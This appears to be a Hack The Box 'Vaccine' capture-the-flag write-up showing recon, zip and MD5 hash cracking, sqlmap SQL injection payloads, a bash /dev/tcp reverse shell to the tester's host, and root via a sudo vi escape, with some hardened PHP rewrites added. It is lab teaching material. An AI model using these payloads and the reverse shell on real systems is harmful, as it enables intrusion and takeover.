Vaccine
Port recognition with nmap, or you can use recon:
┌──(root@ghost)-[/home/ghost]
└─# recon vaccine.htb
[R3C0N] by 0bfxgh0st 4 WWA with ❤
[OS] Linux (99%)
Starting Nmap 7.92 ( https://nmap.org ) at 2022-07-23 12:33 EDT
NSE: Loaded 1 scripts for scanning.
NSE: Script Pre-scanning.
Initiating NSE at 12:33
Completed NSE at 12:33, 0.00s elapsed
Initiating Ping Scan at 12:33
Scanning vaccine.htb (10.129.202.213) [4 ports]
Completed Ping Scan at 12:33, 0.09s elapsed (1 total hosts)
Initiating SYN Stealth Scan at 12:33
Scanning vaccine.htb (10.129.202.213) [65535 ports]
Discovered open port 22/tcp on 10.129.202.213
Discovered open port 80/tcp on 10.129.202.213
Discovered open port 21/tcp on 10.129.202.213
Completed SYN Stealth Scan at 12:33, 16.78s elapsed (65535 total ports)
NSE: Script scanning 10.129.202.213.
Initiating NSE at 12:33
Completed NSE at 12:33, 0.55s elapsed
Nmap scan report for vaccine.htb (10.129.202.213)
Host is up (0.078s latency).
Not shown: 64067 closed tcp ports (reset), 1465 filtered tcp ports (no-response)
Some closed ports may be reported as filtered due to --defeat-rst-ratelimit
PORT STATE SERVICE
21/tcp open ftp
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
|_-rwxr-xr-x 1 0 0 2533 Apr 13 2021 backup.zip
22/tcp open ssh
80/tcp open http
NSE: Script Post-scanning.
Initiating NSE at 12:33
Completed NSE at 12:33, 0.00s elapsed
Read data files from: /usr/bin/../share/nmap
Nmap done: 1 IP address (1 host up) scanned in 17.81 seconds
Raw packets sent: 83105 (3.657MB) | Rcvd: 71468 (2.859MB)
┌─[+] [ftp]
└─(Credentials for ftp vaccine.htb:21)
[user:ftp][password:]
[user:anonymous][password:]
[+] [fuzzin server]
http://vaccine.htb [200 OK] Apache[2.4.41], Cookies[PHPSESSID], Country[RESERVED][ZZ], HTML5, HTTPServer[Ubuntu Linux][Apache/2.4.41 (Ubuntu)], IP[10.129.202.213], PasswordField[password], Title[MegaCorp Login]
-----------------
DIRB v2.22
By The Dark Raver
-----------------
START_TIME: Sat Jul 23 12:33:57 2022
URL_BASE: http://vaccine.htb:80/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt
OPTION: Not Recursive
-----------------
GENERATED WORDS: 4612
---- Scanning URL: http://vaccine.htb:80/ ----
+ http://vaccine.htb:80/index.php (CODE:200|SIZE:2312)
+ http://vaccine.htb:80/server-status (CODE:403|SIZE:276)
-----------------
END_TIME: Sat Jul 23 12:40:29 2022
DOWNLOADED: 4612 - FOUND: 2
recon reports three open ports: 21 for FTP, 22 for SSH and 80 for a web service. It also drops useful FTP information: anonymous login is allowed and the share exposes a backup.zip.
┌──(root@ghost)-[/home/ghost]
└─# ftp vaccine.htb 21
Connected to vaccine.htb.
220 (vsFTPd 3.0.3)
Name (vaccine.htb:ghost): ftp
331 Please specify the password.
Password:
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> get backup.zip
local: backup.zip remote: backup.zip
229 Entering Extended Passive Mode (|||10164|)
150 Opening BINARY mode data connection for backup.zip (2533 bytes).
100% |******************************************************************************************************************************************************| 2533 2.53 MiB/s 00:00 ETA
226 Transfer complete.
2533 bytes received in 00:00 (33.55 KiB/s)
ftp> exit
221 Goodbye.
We have a password-protected zip backup, so we extract its hash with zip2john and crack it:
┌──(root@ghost)-[/home/ghost]
└─# zip2john backup.zip > hash
ver 2.0 efh 5455 efh 7875 backup.zip/index.php PKZIP Encr: TS_chk, cmplen=1201, decmplen=2594, crc=3A41AE06 ts=5722 cs=5722 type=8
ver 2.0 efh 5455 efh 7875 backup.zip/style.css PKZIP Encr: TS_chk, cmplen=986, decmplen=3274, crc=1B1CCD6A ts=989A cs=989a type=8
NOTE: It is assumed that all files in each archive have the same password.
If that is not the case, the hash may be uncrackable. To avoid this, use
option -o to pick a file at a time.
┌──(root@ghost)-[/home/ghost]
└─# john --wordlist=rockyou.txt hash
Using default input encoding: UTF-8
Loaded 1 password hash (PKZIP [32/64])
Press 'q' or Ctrl-C to abort, almost any other key for status
741852963 (backup.zip)
1g 0:00:00:00 DONE (2022-07-23 12:45) 50.00g/s 44800p/s 44800c/s 44800C/s michelle1..ilovegod
Use the "--show" option to display all of the cracked passwords reliably
Session completed.
Now we have the password for the zip file (741852963).
┌──(root@ghost)-[/home/ghost]
└─# unzip backup.zip
Archive: backup.zip
[backup.zip] index.php password:
inflating: index.php
inflating: style.css
┌──(root@ghost)-[/home/ghost]
└─# cat index.php
<!DOCTYPE html>
<?php
session_start();
if(isset($_POST['username']) && isset($_POST['password'])) {
if($_POST['username'] === 'admin' && md5($_POST['password']) === "2cb42f8734ea607eefed3b70af13bbd3") {
$_SESSION['login'] = "true";
header("Location: dashboard.php");
}
}
?>
...
Interesting: if the username is admin and the MD5 of the password equals 2cb42f8734ea607eefed3b70af13bbd3, we are logged in. That is an unsalted MD5 hash hardcoded in the source, so we save it to a file (hash2) and crack it with john:
┌──(root@ghost)-[/home/ghost]
└─# john --format=RAW-MD5 --wordlist=rockyou.txt hash2
Using default input encoding: UTF-8
Loaded 1 password hash (Raw-MD5 [MD5 256/256 AVX2 8x3])
Press 'q' or Ctrl-C to abort, almost any other key for status
qwerty789 (?)
1g 0:00:00:00 DONE (2022-07-23 12:55) 25.00g/s 2505Kp/s 2505Kc/s 2505KC/s shunda..pogimo
Use the "--show --format=Raw-MD5" options to display all of the cracked passwords reliably
Session completed.
So if we log in to http://vaccine.htb as admin with password qwerty789 we should get in.
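As an added example (not the box's own index.php), here is how that login check could be written so that a leaked source file no longer hands over the password: a salted, slow bcrypt hash checked with password_verify(). The users table, the webapp role and the DB_PASSWORD environment variable are assumptions.

```php
<?php
// Added example, not the box's index.php: the same login check with the
// password stored as a salted, slow hash instead of a bare MD5 in the source.
// The users table, the webapp role and DB_PASSWORD are assumptions.
session_start();

function findPasswordHash(PDO $db, string $username): ?string {
    // Bound parameter: the username is never spliced into the SQL text.
    $stmt = $db->prepare('SELECT password_hash FROM users WHERE username = :u');
    $stmt->execute([':u' => $username]);
    $hash = $stmt->fetchColumn();
    return $hash === false ? null : $hash;
}

function verifyLogin(PDO $db, string $username, string $password): bool {
    $stored = findPasswordHash($db, $username);
    // password_verify() re-derives the bcrypt hash with the stored salt and
    // compares in constant time; an offline guess now costs 2^10 bcrypt rounds
    // instead of the ~2.5M MD5 guesses per second john reached above.
    if ($stored === null) {
        // Unknown user: still spend the hashing time so a timing difference
        // does not reveal which usernames exist (constructed dummy hash).
        password_verify($password, password_hash('nope', PASSWORD_BCRYPT));
        return false;
    }
    return password_verify($password, $stored);
}

if (isset($_POST['username'], $_POST['password'])) {
    $db = new PDO('pgsql:host=localhost;dbname=carsdb', 'webapp', getenv('DB_PASSWORD'),
                  [PDO::ATTR_ERRMODE => PDO::ERRMODE_EXCEPTION]);
    if (verifyLogin($db, (string)$_POST['username'], (string)$_POST['password'])) {
        session_regenerate_id(true);   // fresh session id after the login
        $_SESSION['login'] = true;
        header('Location: dashboard.php');
        exit;                          // the original never stopped after header()
    }
}
// Setting a password: store password_hash($plain, PASSWORD_BCRYPT) in users.password_hash
?>
```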

We are logged in to the website; time to inspect the elements there. The dashboard's search parameter looks like a good candidate for sqlmap:
┌──(root@ghost)-[/home/ghost]
└─# sqlmap -u "http://vaccine.htb/dashboard.php?search=Meta" --os-shell --cookie="PHPSESSID=nh62gaptfomsptun0sgqa907eo" --level 5 --risk 3
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
[*] starting @ 13:15:33 /2022-07-23/
[13:15:33] [INFO] testing connection to the target URL
[13:15:34] [INFO] testing if the target URL content is stable
[13:15:34] [INFO] target URL content is stable
[13:15:34] [INFO] testing if GET parameter 'search' is dynamic
[13:15:34] [INFO] GET parameter 'search' appears to be dynamic
[13:15:34] [INFO] heuristic (basic) test shows that GET parameter 'search' might be injectable (possible DBMS: 'PostgreSQL')
[13:15:34] [INFO] heuristic (XSS) test shows that GET parameter 'search' might be vulnerable to cross-site scripting (XSS) attacks
[13:15:34] [INFO] testing for SQL injection on GET parameter 'search'
it looks like the back-end DBMS is 'PostgreSQL'. Do you want to skip test payloads specific for other DBMSes? [Y/n] n
[13:15:40] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[13:15:41] [INFO] GET parameter 'search' appears to be 'AND boolean-based blind - WHERE or HAVING clause' injectable (with --string="SUV")
[13:15:41] [INFO] testing 'Generic inline queries'
[13:15:41] [INFO] testing 'PostgreSQL AND error-based - WHERE or HAVING clause'
[13:15:41] [INFO] GET parameter 'search' is 'PostgreSQL AND error-based - WHERE or HAVING clause' injectable
[13:15:41] [INFO] testing 'PostgreSQL inline queries'
[13:15:41] [INFO] testing 'PostgreSQL > 8.1 stacked queries (comment)'
[13:15:41] [WARNING] time-based comparison requires larger statistical model, please wait................... (done)
[13:16:06] [INFO] GET parameter 'search' appears to be 'PostgreSQL > 8.1 stacked queries (comment)' injectable
[13:16:06] [INFO] testing 'PostgreSQL > 8.1 AND time-based blind'
[13:16:16] [INFO] GET parameter 'search' appears to be 'PostgreSQL > 8.1 AND time-based blind' injectable
[13:16:16] [INFO] testing 'Generic UNION query (NULL) - 1 to 20 columns'
[13:16:16] [INFO] automatically extending ranges for UNION query injection technique tests as there is at least one other (potential) technique found
[13:16:16] [INFO] 'ORDER BY' technique appears to be usable. This should reduce the time needed to find the right number of query columns. Automatically extending the range for current UNION query injection technique test
[13:16:16] [WARNING] reflective value(s) found and filtering out
[13:16:17] [INFO] target URL appears to have 5 columns in query
[13:16:17] [INFO] GET parameter 'search' is 'Generic UNION query (NULL) - 1 to 20 columns' injectable
GET parameter 'search' is vulnerable. Do you want to keep testing the others (if any)? [y/N] n
sqlmap identified the following injection point(s) with a total of 43 HTTP(s) requests:
---
Parameter: search (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: search=Meta' AND 3965=3965-- GKOe
Type: error-based
Title: PostgreSQL AND error-based - WHERE or HAVING clause
Payload: search=Meta' AND 1147=CAST((CHR(113)||CHR(113)||CHR(112)||CHR(107)||CHR(113))||(SELECT (CASE WHEN (1147=1147) THEN 1 ELSE 0 END))::text||(CHR(113)||CHR(98)||CHR(113)||CHR(107)||CHR(113)) AS NUMERIC)-- BFtu
Type: stacked queries
Title: PostgreSQL > 8.1 stacked queries (comment)
Payload: search=Meta';SELECT PG_SLEEP(5)--
Type: time-based blind
Title: PostgreSQL > 8.1 AND time-based blind
Payload: search=Meta' AND 4697=(SELECT 4697 FROM PG_SLEEP(5))-- QCgq
Type: UNION query
Title: Generic UNION query (NULL) - 5 columns
Payload: search=Meta' UNION ALL SELECT NULL,NULL,NULL,NULL,(CHR(113)||CHR(113)||CHR(112)||CHR(107)||CHR(113))||(CHR(65)||CHR(89)||CHR(109)||CHR(72)||CHR(82)||CHR(107)||CHR(99)||CHR(118)||CHR(119)||CHR(65)||CHR(85)||CHR(110)||CHR(87)||CHR(118)||CHR(71)||CHR(90)||CHR(83)||CHR(122)||CHR(116)||CHR(65)||CHR(102)||CHR(103)||CHR(114)||CHR(120)||CHR(71)||CHR(103)||CHR(116)||CHR(110)||CHR(79)||CHR(89)||CHR(120)||CHR(71)||CHR(108)||CHR(84)||CHR(97)||CHR(121)||CHR(75)||CHR(108)||CHR(121)||CHR(119))||(CHR(113)||CHR(98)||CHR(113)||CHR(107)||CHR(113))-- qdkg
---
[13:16:27] [INFO] the back-end DBMS is PostgreSQL
web server operating system: Linux Ubuntu 20.10 or 20.04 or 19.10 (focal or eoan)
web application technology: Apache 2.4.41
back-end DBMS: PostgreSQL
[13:16:27] [INFO] fingerprinting the back-end DBMS operating system
[13:16:28] [INFO] the back-end DBMS operating system is Linux
[13:16:28] [INFO] testing if current user is DBA
[13:16:28] [INFO] going to use 'COPY ... FROM PROGRAM ...' command execution
[13:16:28] [INFO] calling Linux OS shell. To quit type 'x' or 'q' and press ENTER
os-shell> bash -c "bash -i >& /dev/tcp/10.10.14.224/1337 0>&1"
After running sqlmap with our admin session cookie (PHPSESSID=nh62gaptfomsptun0sgqa907eo) we get command execution through PostgreSQL's COPY ... FROM PROGRAM, and because of the --os-shell limitations we upgrade to a proper Linux reverse shell, caught with nc:
┌──(root@ghost)-[/home/ghost]
└─# nc -lvp 1337
connect to [10.10.14.224] from vaccine.htb [10.129.202.213] 60692
bash: cannot set terminal process group (2635): Inappropriate ioctl for device
bash: no job control in this shell
postgres@vaccine:/var/lib/postgresql/11/main$ cat ../../user.txt
cat ../../user.txt
ec9b13ca4d6229cd5cc1e09980965bf7
We have the user flag.
postgres@vaccine:/var/lib/postgresql/11/main$ cd /var/www/html
cd /var/www/html
postgres@vaccine:/var/www/html$ ls
ls
bg.png
dashboard.css
dashboard.js
dashboard.php
index.php
license.txt
style.css
postgres@vaccine:/var/www/html$ cat dashboard.php
cat dashboard.php
...
<?php
session_start();
if($_SESSION['login'] !== "true") {
header("Location: index.php");
die();
}
try {
$conn = pg_connect("host=localhost port=5432 dbname=carsdb user=postgres password=P@s5w0rd!");
}
...
postgres@vaccine:/var/www/html$
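The injection sqlmap found in the search parameter, and the command execution it reached through COPY ... FROM PROGRAM, both come from dashboard.php. As an added example (not the box's own dashboard.php), here is the search handler rewritten with a bound parameter, a non-superuser database role and the password taken from the environment. The cars table and its columns, the webapp_ro role and CARSDB_PASSWORD are assumptions; the page only shows the connection string.

```php
<?php
// Added example, not the box's dashboard.php: the search handler with the
// `search` value passed as a bound parameter instead of spliced into the SQL.
// Assumed schema cars(name, type, fuel, engine); role and env var are assumptions.
session_start();
if (($_SESSION['login'] ?? false) !== true) {
    header('Location: index.php');
    exit;
}

// Dedicated non-superuser role. COPY ... FROM PROGRAM (the path sqlmap used for
// command execution above) needs superuser or pg_execute_server_program, so a
// read-only role removes that even if an injection slips through somewhere else.
$conn = pg_connect(sprintf(
    'host=localhost port=5432 dbname=carsdb user=webapp_ro password=%s',
    getenv('CARSDB_PASSWORD')   // secret from the environment, not the source file
));
if ($conn === false) {
    http_response_code(500);
    exit('database unavailable');
}

function searchCars($conn, string $term): array {
    // $1 is sent by the driver separately from the query text, so a value such as
    // "Meta' UNION ALL SELECT NULL,..." is only a string to match, never SQL.
    $res = pg_query_params(
        $conn,
        'SELECT name, type, fuel, engine FROM cars WHERE name ILIKE $1 ORDER BY name',
        ['%' . $term . '%']
    );
    return $res === false ? [] : (pg_fetch_all($res) ?: []);
}

$rows = searchCars($conn, (string)($_GET['search'] ?? ''));
foreach ($rows as $row) {
    // Escape on output too: sqlmap also flagged the parameter as reflected XSS.
    echo '<tr>';
    foreach ($row as $cell) {
        echo '<td>' . htmlspecialchars((string)$cell, ENT_QUOTES, 'UTF-8') . '</td>';
    }
    echo "</tr>\n";
}
?>
```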
We found more credentials hardcoded in dashboard.php (postgres / P@s5w0rd!); let's try them over SSH.
┌──(root@ghost)-[/home/ghost]
└─# ssh postgres@vaccine.htb
The authenticity of host 'vaccine.htb (10.129.202.213)' can't be established.
ED25519 key fingerprint is SHA256:4qLpMBLGtEbuHObR8YU15AGlIlpd0dsdiGh/pkeZYFo.
This key is not known by any other names
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added 'vaccine.htb' (ED25519) to the list of known hosts.
postgres@vaccine.htb's password:
Welcome to Ubuntu 19.10 (GNU/Linux 5.3.0-64-generic x86_64)
* Documentation: https://help.ubuntu.com
* Management: https://landscape.canonical.com
* Support: https://ubuntu.com/advantage
System information as of Sat 23 Jul 2022 05:42:52 PM UTC
System load: 0.04 Processes: 188
Usage of /: 32.6% of 8.73GB Users logged in: 0
Memory usage: 31% IP address for ens160: 10.129.202.213
Swap usage: 0%
0 updates can be installed immediately.
0 of these updates are security updates.
The list of available updates is more than a week old.
To check for new updates run: sudo apt update
The programs included with the Ubuntu system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.
Ubuntu comes with ABSOLUTELY NO WARRANTY, to the extent permitted by
applicable law.
postgres@vaccine:~$ sudo -l
[sudo] password for postgres:
Matching Defaults entries for postgres on vaccine:
env_keep+="LANG LANGUAGE LINGUAS LC_* _XKB_CHARSET", env_keep+="XAPPLRESDIR XFILESEARCHPATH XUSERFILESEARCHPATH",
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin, mail_badpass
User postgres may run the following commands on vaccine:
(ALL) /bin/vi /etc/postgresql/11/main/pg_hba.conf
As we can see, postgres may run /bin/vi on /etc/postgresql/11/main/pg_hba.conf as root via sudo. An interactive editor like vi can spawn a shell from inside the editor, so this rule is effectively a root shell; sudoedit would have granted the file edit without that.
postgres@vaccine:~$ sudo /bin/vi /etc/postgresql/11/main/pg_hba.conf

postgres@vaccine:~$ sudo /bin/vi /etc/postgresql/11/main/pg_hba.conf
# whoami
root
# cat /root/root.txt
dd6e058e814260bc70e9bbdef2715849